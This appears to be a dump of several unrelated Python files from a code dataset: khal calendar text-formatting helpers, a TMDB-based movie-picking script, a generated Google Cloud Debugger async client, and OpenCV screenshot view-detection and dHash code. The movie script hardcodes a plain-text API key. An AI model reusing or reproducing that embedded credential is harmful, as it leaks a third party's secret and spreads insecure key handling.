def find_unmatched_sgr(string: str) -> Optional[str]:
reset_pos, _, _ = find_last_reset(string)
sgr_pos, _, sgr = find_last_sgr(string)
if sgr_pos > reset_pos:
return sgr
else:
return None
def color_wrap(text: str, width: int = 70) -> List[str]:
"""A variant of wrap that takes SGR codes (somewhat) into account.
This doesn't actually adjust the length, but makes sure that
    lines that enable some attributes also contain a RESET, and also adds
that code to the next line
"""
# TODO we really want to ignore all SGR codes when measuring the width
lines = wrap(text, width)
for num, _ in enumerate(lines):
sgr = find_unmatched_sgr(lines[num])
if sgr is not None:
lines[num] += RESET
if (num + 1) < len(lines):
lines[num + 1] = sgr + lines[num + 1]
return lines
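# Illustrative example (not part of the original file): wrapping a string that opens
# a color and only resets it at the very end keeps each produced line balanced,
# roughly
#
#   lines = color_wrap('\x1b[31m' + 'some long red text ' * 10 + RESET, width=30)
#
# Lines that would otherwise leave the color open get a RESET appended, and the
# color code is re-opened at the start of the following line.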
def get_weekday_occurrence(day: dt.date) -> Tuple[int, int]:
"""Calculate how often this weekday has already occurred in a given month.
:returns: weekday (0=Monday, ..., 6=Sunday), occurrence
"""
xthday = 1 + (day.day - 1) // 7
return day.weekday(), xthday
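# Worked example (not part of the original file): 2021-03-15 was the third Monday
# of March 2021, so
#
#   get_weekday_occurrence(dt.date(2021, 3, 15))  # -> (0, 3)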
def get_month_abbr_len() -> int:
"""Calculate the number of characters we need to display the month
abbreviated name. It depends on the locale.
"""
return max(len(month_abbr[i]) for i in range(1, 13)) + 1
def localize_strip_tz(dates: List[dt.datetime], timezone: dt.tzinfo) -> Iterator[dt.datetime]:
"""converts a list of dates to timezone, than removes tz info"""
for one_date in dates:
if getattr(one_date, 'tzinfo', None) is not None:
one_date = one_date.astimezone(timezone)
one_date = one_date.replace(tzinfo=None)
yield one_date
def to_unix_time(dtime: dt.datetime) -> float:
"""convert a datetime object to unix time in UTC (as a float)"""
if getattr(dtime, 'tzinfo', None) is not None:
dtime = dtime.astimezone(pytz.UTC)
unix_time = timegm(dtime.timetuple())
return unix_time
def to_naive_utc(dtime: dt.datetime) -> dt.datetime:
"""convert a datetime object to UTC and than remove the tzinfo, if
datetime is naive already, return it
"""
if not hasattr(dtime, 'tzinfo') or dtime.tzinfo is None:
return dtime
dtime_utc = dtime.astimezone(pytz.UTC)
dtime_naive = dtime_utc.replace(tzinfo=None)
return dtime_naive
def is_aware(dtime: dt.datetime) -> bool:
"""test if a datetime instance is timezone aware"""
if dtime.tzinfo is not None and dtime.tzinfo.utcoffset(dtime) is not None:
return True
else:
return False
def relative_timedelta_str(day: dt.date) -> str:
"""Converts the timespan from `day` to today into a human readable string.
"""
days = (day - dt.date.today()).days
if days < 0:
direction = 'ago'
else:
direction = 'from now'
approx = ''
if abs(days) < 7:
unit = 'day'
count = abs(days)
elif abs(days) < 365:
unit = 'week'
count = int(abs(days) / 7)
if abs(days) % 7 != 0:
approx = '~'
else:
unit = 'year'
count = int(abs(days) / 365)
if abs(days) % 365 != 0:
approx = '~'
if count > 1:
unit += 's'
return '{approx}{count} {unit} {direction}'.format(
approx=approx,
count=count,
unit=unit,
direction=direction,
)
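# Worked examples (not part of the original file), all relative to "today":
#
#   relative_timedelta_str(dt.date.today() + dt.timedelta(days=3))    # '3 days from now'
#   relative_timedelta_str(dt.date.today() + dt.timedelta(days=14))   # '2 weeks from now'
#   relative_timedelta_str(dt.date.today() - dt.timedelta(days=400))  # '~1 year ago'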
def get_wrapped_text(widget):
return widget.original_widget.get_edit_text()
def human_formatter(format_string, width=None, colors=True):
"""Create a formatter that formats events to be human readable."""
def fmt(rows):
single = type(rows) == dict
if single:
rows = [rows]
results = []
for row in rows:
if 'calendar-color' in row:
row['calendar-color'] = get_color(row['calendar-color'])
s = format_string.format(**row)
if colors:
s += style('', reset=True)
if width:
results += color_wrap(s, width)
else:
results.append(s)
if single:
return results[0]
else:
return results
return fmt
CONTENT_ATTRIBUTES = ['start', 'start-long', 'start-date', 'start-date-long',
'start-time', 'end', 'end-long', 'end-date', 'end-date-long', 'end-time',
'duration', 'start-full', 'start-long-full', 'start-date-full',
'start-date-long-full', 'start-time-full', 'end-full', 'end-long-full',
'end-date-full', 'end-date-long-full', 'end-time-full', 'duration-full',
'start-style', 'end-style', 'to-style', 'start-end-time-style',
'end-necessary', 'end-necessary-long', 'repeat-symbol', 'repeat-pattern',
'title', 'organizer', 'description', 'location', 'all-day', 'categories',
'uid', 'url', 'calendar', 'calendar-color', 'status', 'cancelled']
def json_formatter(fields):
"""Create a formatter that formats events in JSON."""
if len(fields) == 1 and fields[0] == 'all':
fields = CONTENT_ATTRIBUTES
def fmt(rows):
single = type(rows) == dict
if single:
rows = [rows]
filtered = []
for row in rows:
f = dict(filter(lambda e: e[0] in fields and e[0] in CONTENT_ATTRIBUTES, row.items()))
if f.get('repeat-symbol', '') != '':
f["repeat-symbol"] = f["repeat-symbol"].strip()
if f.get('status', '') != '':
f["status"] = f["status"].strip()
if f.get('cancelled', '') != '':
f["cancelled"] = f["cancelled"].strip()
filtered.append(f)
results = [json.dumps(filtered, ensure_ascii=False)]
if single:
return results[0]
else:
return results
return fmt
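# Illustrative usage sketch (not part of the original file): a formatter built from a
# field list keeps only those keys of each event row, e.g.
#
#   fmt = json_formatter(['title', 'start', 'end'])
#   fmt({'title': 'standup', 'start': '09:00', 'end': '09:15', 'calendar': 'work'})
#   # -> '[{"title": "standup", "start": "09:00", "end": "09:15"}]'
#
# The event dict is invented for the example; real rows come from khal's event
# formatting code.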
|
the-stack_106_22038
|
# Helper Functions
# Imports
import requests, json, os
# Credentials
api_key = "04b2253f2a386ad7e8fcc3104c69531e"
# Genres Function
def get_genres():
query = f"https://api.themoviedb.org/3/genre/movie/list?api_key={api_key}&language=en-US"
response = requests.get(query)
if response.status_code == 200:
array = response.json()
genres = {}
for i in array['genres']:
genres[i['id']] = i['name']
return genres
else:
return ("error")
# Introduction Function
def greeting():
print("Hi there! Struggling to find a movie to watch? Let us help!")
print(".")
print(".")
print(".")
print(".")
print("Simply type y or n in response to each of the questions, and your partner will do the same.")
print(".")
print(".")
print(".")
print(".")
# User Input
def get_input(choices, stage):
'''
    Takes input from two users and returns the intersection of their choices.
    The second argument, stage, is 1 when choosing genres and 2 when choosing movies.
'''
    # User 1 Input
user1 = []
print("\nFirst User\n")
for choice in choices:
if stage == 1:
user_input = input(f"Do you want to watch a {choice} movie? " )
elif stage == 2:
user_input = input(f"Do you want to watch {choice}? " )
if user_input == "y":
user1.append(choice)
# User 2 Input
user2 = []
print("\nSecond User\n")
for choice in choices:
if stage == 1:
user_input = input(f"Do you want to watch a {choice} movie? " )
elif stage == 2:
user_input = input(f"Do you want to watch {choice}? " )
if user_input == "y":
user2.append(choice)
return list(set(user1).intersection(user2))
# Matching Genres
def responseMessage(genres):
'''
Depending on the matched genres, returns a string.
'''
print("\n")
if len(genres) == 1:
return "You should watch " + genres[0] + "!\n"
elif len(genres) == 2:
return "You should watch " + genres[0] + " or " + genres[1] + "!\n"
elif len(genres) >= 3:
message = "You should watch "
for i in range(len(genres) - 1):
message = message + genres[i] + ", "
message = message + " or " + str(genres[-1]) + ".\n"
return message
else:
return "Maybe you should go for a walk?\n"
# Find Trending Movies based on their genres
def findMovies(genres):
query2 = f"https://api.themoviedb.org/3/trending/movie/day?api_key={api_key}"
response = requests.get(query2)
    data = response.json()
    movie_choices = {}
    for title in data['results']:
movie_genres = []
for genre in title['genre_ids']:
movie_genres.append(genres[genre])
movie_choices[title['original_title']] = movie_genres
return movie_choices
def likedMovies(genres, movie_choices):
movies_list = []
for key, value in movie_choices.items():
if set(genres).intersection(value):
movies_list.append(key)
return movies_list
def outputMessage(movies_list):
'''
Takes a final list of movies and prints the output.
'''
message = "\nYou should watch:\n"
for movie in movies_list:
message += "- " + movie
return message
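# Illustrative end-to-end sketch (not part of the original file) of how these helpers
# are presumably wired together by a driver script:
#
#   greeting()
#   genres = get_genres()                          # {id: name} from TMDB
#   common = get_input(list(genres.values()), 1)   # genre names both users accepted
#   print(responseMessage(common))
#   movie_choices = findMovies(genres)             # {title: [genre names]} for trending movies
#   print(outputMessage(likedMovies(common, movie_choices)))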
|
the-stack_106_22039
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import functools
import re
from typing import Dict, Sequence, Tuple, Type, Union
import pkg_resources
import google.api_core.client_options as ClientOptions # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.debugger_v2.types import data
from google.cloud.debugger_v2.types import debugger
from .transports.base import Debugger2Transport, DEFAULT_CLIENT_INFO
from .transports.grpc_asyncio import Debugger2GrpcAsyncIOTransport
from .client import Debugger2Client
class Debugger2AsyncClient:
"""The Debugger service provides the API that allows users to
collect run-time information from a running application, without
stopping or slowing it down and without modifying its state. An
application may include one or more replicated processes
performing the same work.
A debugged application is represented using the Debuggee
concept. The Debugger service provides a way to query for
available debuggees, but does not provide a way to create one.
A debuggee is created using the Controller service, usually by
running a debugger agent with the application.
The Debugger service enables the client to set one or more
Breakpoints on a Debuggee and collect the results of the set
Breakpoints.
"""
_client: Debugger2Client
DEFAULT_ENDPOINT = Debugger2Client.DEFAULT_ENDPOINT
DEFAULT_MTLS_ENDPOINT = Debugger2Client.DEFAULT_MTLS_ENDPOINT
common_billing_account_path = staticmethod(Debugger2Client.common_billing_account_path)
parse_common_billing_account_path = staticmethod(Debugger2Client.parse_common_billing_account_path)
common_folder_path = staticmethod(Debugger2Client.common_folder_path)
parse_common_folder_path = staticmethod(Debugger2Client.parse_common_folder_path)
common_organization_path = staticmethod(Debugger2Client.common_organization_path)
parse_common_organization_path = staticmethod(Debugger2Client.parse_common_organization_path)
common_project_path = staticmethod(Debugger2Client.common_project_path)
parse_common_project_path = staticmethod(Debugger2Client.parse_common_project_path)
common_location_path = staticmethod(Debugger2Client.common_location_path)
parse_common_location_path = staticmethod(Debugger2Client.parse_common_location_path)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
Debugger2AsyncClient: The constructed client.
"""
return Debugger2Client.from_service_account_info.__func__(Debugger2AsyncClient, info, *args, **kwargs) # type: ignore
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
Debugger2AsyncClient: The constructed client.
"""
return Debugger2Client.from_service_account_file.__func__(Debugger2AsyncClient, filename, *args, **kwargs) # type: ignore
from_service_account_json = from_service_account_file
@property
def transport(self) -> Debugger2Transport:
"""Returns the transport used by the client instance.
Returns:
Debugger2Transport: The transport used by the client instance.
"""
return self._client.transport
get_transport_class = functools.partial(type(Debugger2Client).get_transport_class, type(Debugger2Client))
def __init__(self, *,
credentials: ga_credentials.Credentials = None,
transport: Union[str, Debugger2Transport] = "grpc_asyncio",
client_options: ClientOptions = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the debugger2 client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, ~.Debugger2Transport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (ClientOptions): Custom options for the client. It
won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
"""
self._client = Debugger2Client(
credentials=credentials,
transport=transport,
client_options=client_options,
client_info=client_info,
)
async def set_breakpoint(self,
request: debugger.SetBreakpointRequest = None,
*,
debuggee_id: str = None,
breakpoint_: data.Breakpoint = None,
client_version: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> debugger.SetBreakpointResponse:
r"""Sets the breakpoint to the debuggee.
Args:
request (:class:`google.cloud.debugger_v2.types.SetBreakpointRequest`):
The request object. Request to set a breakpoint
debuggee_id (:class:`str`):
Required. ID of the debuggee where
the breakpoint is to be set.
This corresponds to the ``debuggee_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
breakpoint_ (:class:`google.cloud.debugger_v2.types.Breakpoint`):
Required. Breakpoint specification to set. The field
``location`` of the breakpoint must be set.
This corresponds to the ``breakpoint_`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
client_version (:class:`str`):
Required. The client version making the call. Schema:
``domain/type/version`` (e.g.,
``google.com/intellij/v1``).
This corresponds to the ``client_version`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.debugger_v2.types.SetBreakpointResponse:
Response for setting a breakpoint.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([debuggee_id, breakpoint_, client_version])
if request is not None and has_flattened_params:
raise ValueError("If the `request` argument is set, then none of "
"the individual field arguments should be set.")
request = debugger.SetBreakpointRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if debuggee_id is not None:
request.debuggee_id = debuggee_id
if breakpoint_ is not None:
request.breakpoint_ = breakpoint_
if client_version is not None:
request.client_version = client_version
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.set_breakpoint,
default_timeout=600.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def get_breakpoint(self,
request: debugger.GetBreakpointRequest = None,
*,
debuggee_id: str = None,
breakpoint_id: str = None,
client_version: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> debugger.GetBreakpointResponse:
r"""Gets breakpoint information.
Args:
request (:class:`google.cloud.debugger_v2.types.GetBreakpointRequest`):
The request object. Request to get breakpoint
information.
debuggee_id (:class:`str`):
Required. ID of the debuggee whose
breakpoint to get.
This corresponds to the ``debuggee_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
breakpoint_id (:class:`str`):
Required. ID of the breakpoint to
get.
This corresponds to the ``breakpoint_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
client_version (:class:`str`):
Required. The client version making the call. Schema:
``domain/type/version`` (e.g.,
``google.com/intellij/v1``).
This corresponds to the ``client_version`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.debugger_v2.types.GetBreakpointResponse:
Response for getting breakpoint
information.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([debuggee_id, breakpoint_id, client_version])
if request is not None and has_flattened_params:
raise ValueError("If the `request` argument is set, then none of "
"the individual field arguments should be set.")
request = debugger.GetBreakpointRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if debuggee_id is not None:
request.debuggee_id = debuggee_id
if breakpoint_id is not None:
request.breakpoint_id = breakpoint_id
if client_version is not None:
request.client_version = client_version
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.get_breakpoint,
default_retry=retries.Retry(
                initial=0.1, maximum=60.0, multiplier=1.3, predicate=retries.if_exception_type(
core_exceptions.DeadlineExceeded,
core_exceptions.ServiceUnavailable,
),
deadline=600.0,
),
default_timeout=600.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def delete_breakpoint(self,
request: debugger.DeleteBreakpointRequest = None,
*,
debuggee_id: str = None,
breakpoint_id: str = None,
client_version: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> None:
r"""Deletes the breakpoint from the debuggee.
Args:
request (:class:`google.cloud.debugger_v2.types.DeleteBreakpointRequest`):
The request object. Request to delete a breakpoint.
debuggee_id (:class:`str`):
Required. ID of the debuggee whose
breakpoint to delete.
This corresponds to the ``debuggee_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
breakpoint_id (:class:`str`):
Required. ID of the breakpoint to
delete.
This corresponds to the ``breakpoint_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
client_version (:class:`str`):
Required. The client version making the call. Schema:
``domain/type/version`` (e.g.,
``google.com/intellij/v1``).
This corresponds to the ``client_version`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([debuggee_id, breakpoint_id, client_version])
if request is not None and has_flattened_params:
raise ValueError("If the `request` argument is set, then none of "
"the individual field arguments should be set.")
request = debugger.DeleteBreakpointRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if debuggee_id is not None:
request.debuggee_id = debuggee_id
if breakpoint_id is not None:
request.breakpoint_id = breakpoint_id
if client_version is not None:
request.client_version = client_version
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.delete_breakpoint,
default_retry=retries.Retry(
                initial=0.1, maximum=60.0, multiplier=1.3, predicate=retries.if_exception_type(
core_exceptions.DeadlineExceeded,
core_exceptions.ServiceUnavailable,
),
deadline=600.0,
),
default_timeout=600.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Send the request.
await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
async def list_breakpoints(self,
request: debugger.ListBreakpointsRequest = None,
*,
debuggee_id: str = None,
client_version: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> debugger.ListBreakpointsResponse:
r"""Lists all breakpoints for the debuggee.
Args:
request (:class:`google.cloud.debugger_v2.types.ListBreakpointsRequest`):
The request object. Request to list breakpoints.
debuggee_id (:class:`str`):
Required. ID of the debuggee whose
breakpoints to list.
This corresponds to the ``debuggee_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
client_version (:class:`str`):
Required. The client version making the call. Schema:
``domain/type/version`` (e.g.,
``google.com/intellij/v1``).
This corresponds to the ``client_version`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.debugger_v2.types.ListBreakpointsResponse:
Response for listing breakpoints.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([debuggee_id, client_version])
if request is not None and has_flattened_params:
raise ValueError("If the `request` argument is set, then none of "
"the individual field arguments should be set.")
request = debugger.ListBreakpointsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if debuggee_id is not None:
request.debuggee_id = debuggee_id
if client_version is not None:
request.client_version = client_version
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.list_breakpoints,
default_retry=retries.Retry(
                initial=0.1, maximum=60.0, multiplier=1.3, predicate=retries.if_exception_type(
core_exceptions.DeadlineExceeded,
core_exceptions.ServiceUnavailable,
),
deadline=600.0,
),
default_timeout=600.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def list_debuggees(self,
request: debugger.ListDebuggeesRequest = None,
*,
project: str = None,
client_version: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> debugger.ListDebuggeesResponse:
r"""Lists all the debuggees that the user has access to.
Args:
request (:class:`google.cloud.debugger_v2.types.ListDebuggeesRequest`):
The request object. Request to list debuggees.
project (:class:`str`):
Required. Project number of a Google
Cloud project whose debuggees to list.
This corresponds to the ``project`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
client_version (:class:`str`):
Required. The client version making the call. Schema:
``domain/type/version`` (e.g.,
``google.com/intellij/v1``).
This corresponds to the ``client_version`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.debugger_v2.types.ListDebuggeesResponse:
Response for listing debuggees.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([project, client_version])
if request is not None and has_flattened_params:
raise ValueError("If the `request` argument is set, then none of "
"the individual field arguments should be set.")
request = debugger.ListDebuggeesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if project is not None:
request.project = project
if client_version is not None:
request.client_version = client_version
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.list_debuggees,
default_retry=retries.Retry(
                initial=0.1, maximum=60.0, multiplier=1.3, predicate=retries.if_exception_type(
core_exceptions.DeadlineExceeded,
core_exceptions.ServiceUnavailable,
),
deadline=600.0,
),
default_timeout=600.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc, tb):
await self.transport.close()
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-debugger-client",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
__all__ = (
"Debugger2AsyncClient",
)
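# Usage sketch (not part of the generated client; the project id below is a
# hypothetical placeholder). The async client is typically driven from an
# asyncio event loop, for example:
#
#   import asyncio
#   from google.cloud import debugger_v2
#
#   async def main():
#       client = debugger_v2.Debugger2AsyncClient()
#       response = await client.list_debuggees(
#           project="my-project", client_version="google.com/intellij/v1")
#       for debuggee in response.debuggees:
#           print(debuggee.id)
#
#   asyncio.run(main())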
|
the-stack_106_22040
|
# This file is created by Minyi Liu (GitHub ID: MiniMinyi)
# The hash algorithm is copied from:
# https://github.com/hjaurum/DHash/blob/master/dHash.py
def _intersect(rect1, rect2):
"""
Check whether two rectangles intersect.
    :param rect1, rect2: a rectangle represented as a tuple (x, y, w, h, approxPoly_corner_count)
    :return: whether the two rectangles intersect
"""
# check x
x_intersect = False
if rect1[0] <= rect2[0] and rect2[0] - rect1[0] < rect1[2]:
x_intersect = True
if rect2[0] <= rect1[0] and rect1[0] - rect2[0] < rect2[2]:
x_intersect = True
# check y
y_intersect = False
if rect1[1] <= rect2[1] and rect2[1] - rect1[1] < rect1[3]:
y_intersect = True
if rect2[1] <= rect1[1] and rect1[1] - rect2[1] < rect2[3]:
y_intersect = True
return x_intersect and y_intersect
def load_image_from_path(img_path):
"""
Load an image from path
:param img_path: The path to the image
    :return: numpy.ndarray, the loaded image in OpenCV (BGR) format
"""
import cv2
return cv2.imread(img_path)
def load_image_from_buf(img_bytes):
"""
Load an image from a byte array
:param img_bytes: The byte array of an image
    :return: numpy.ndarray, the image decoded from the byte buffer
"""
import cv2
import numpy
    # cv2.imdecode expects a 1-D uint8 buffer, so convert the raw bytes first
    img_bytes = numpy.asarray(bytearray(img_bytes), dtype=numpy.uint8)
return cv2.imdecode(img_bytes, cv2.IMREAD_UNCHANGED)
def find_views(img):
"""
Find rectangular views given a UI screenshot
:param img: numpy.ndarray, representing an image in opencv
:return: a list of rectangles, each of which is a tuple (x,y,w,h) representing an identified UI view.
"""
import cv2
x_scale = 0.3
y_scale = 0.3
# resize to a smaller image
img = cv2.resize(img, (0, 0), fx=x_scale, fy=y_scale)
    # get image dimensions (number of rows = height, number of columns = width)
    height = len(img)
    width = len(img[0])
    area = width * height
# Split out each channel
blue, green, red = cv2.split(img)
# Run canny edge detection on each channel
blue_edges = cv2.Canny(blue, 200, 250)
green_edges = cv2.Canny(green, 200, 250)
red_edges = cv2.Canny(red, 200, 250)
# Join edges back into image
edges = blue_edges | green_edges | red_edges
    # find contours (OpenCV >= 4 returns (contours, hierarchy); OpenCV 3.x also
    # returns the modified image as the first element)
    contours, hierarchy = cv2.findContours(edges, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
    rectangle_list = []
    for cnt in contours:
contour_area = cv2.contourArea(cnt)
# area constraint
if contour_area < area / 300 or contour_area > area / 4:
continue
x, y, w, h = cv2.boundingRect(cnt)
# find approxPolyDP
epsilon = 0.01 * cv2.arcLength(cnt, True)
approx = cv2.approxPolyDP(cnt, epsilon, True)
if len(approx) == 2:
continue
new_rectangle = (x, y, w, h, len(approx))
should_append = True
remove_list = []
for index, rectangle in enumerate(rectangle_list):
if _intersect(new_rectangle, rectangle):
if new_rectangle[4] > rectangle[4]:
should_append = False
break
else:
remove_list.append(index)
remove_list.reverse()
for index in remove_list:
del rectangle_list[index]
if should_append:
rectangle_list.append(new_rectangle)
result_rectangles = [
(int(float(x)/x_scale), int(float(y)/y_scale), int(float(w)/x_scale), int(float(h)/y_scale))
for x, y, w, h, len_approx in rectangle_list]
# For debugging, show the image
# print result_rectangles
# for x, y, w, h, len_approx in rectangle_list:
# cv2.rectangle(img, (x, y), (x+w, y+h), (0, 255, 0), 5)
# cv2.imshow('image', img)
# cv2.waitKey(0)
# cv2.destroyAllWindows()
return result_rectangles
def calculate_dhash(img):
"""
Calculate the dhash value of an image.
:param img: numpy.ndarray, representing an image in opencv
:return:
"""
difference = _calculate_pixel_difference(img)
# convert to hex
decimal_value = 0
hash_string = ""
for index, value in enumerate(difference):
if value:
decimal_value += value * (2 ** (index % 8))
        if index % 8 == 7:  # every eight bits are folded into two hex digits
            hash_string += hex(decimal_value)[2:].rjust(2, "0")  # e.g. 0xf => "0f"
decimal_value = 0
return hash_string
def _calculate_pixel_difference(img):
"""
Calculate difference between pixels
:param img: numpy.ndarray, representing an image in opencv
"""
import cv2
resize_width = 18
resize_height = 16
# 1. resize to 18*16
smaller_image = cv2.resize(img, (resize_width, resize_height))
# 2. calculate grayscale
grayscale_image = cv2.cvtColor(smaller_image, cv2.COLOR_BGR2GRAY)
# 3. calculate difference between pixels
difference = []
for row in range(resize_height):
for col in range(resize_width - 1):
difference.append(grayscale_image[row][col] > grayscale_image[row][col + 1])
return difference
def img_hamming_distance(img1, img2):
"""
Calculate the hamming distance between two images
:param img1: numpy.ndarray, representing an image in opencv
:param img2: numpy.ndarray, representing an image in opencv
:return: int, the hamming distance between two images
"""
# A. use dHash value to calculate hamming distance
if isinstance(img1, str) and isinstance(img2, str):
return dhash_hamming_distance(img1, img2)
# B. use numpy.ndarray to calculate hamming distance
_hamming_distance = 0
image1_difference = _calculate_pixel_difference(img1)
image2_difference = _calculate_pixel_difference(img2)
for index, img1_pix in enumerate(image1_difference):
img2_pix = image2_difference[index]
if img1_pix != img2_pix:
_hamming_distance += 1
return _hamming_distance
def dhash_hamming_distance(dhash1, dhash2):
"""
Calculate the hamming distance between two dhash values
:param dhash1: str, the dhash of an image returned by `calculate_dhash`
:param dhash2: str, the dhash of an image returned by `calculate_dhash`
:return: int, the hamming distance between two dhash values
"""
difference = (int(dhash1, 16)) ^ (int(dhash2, 16))
return bin(difference).count("1")
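# Minimal usage sketch (not part of the original module); the screenshot paths
# below are hypothetical placeholders.
if __name__ == "__main__":
    img_a = load_image_from_path("screenshot_a.png")
    img_b = load_image_from_path("screenshot_b.png")
    print("views in screenshot A:", find_views(img_a))
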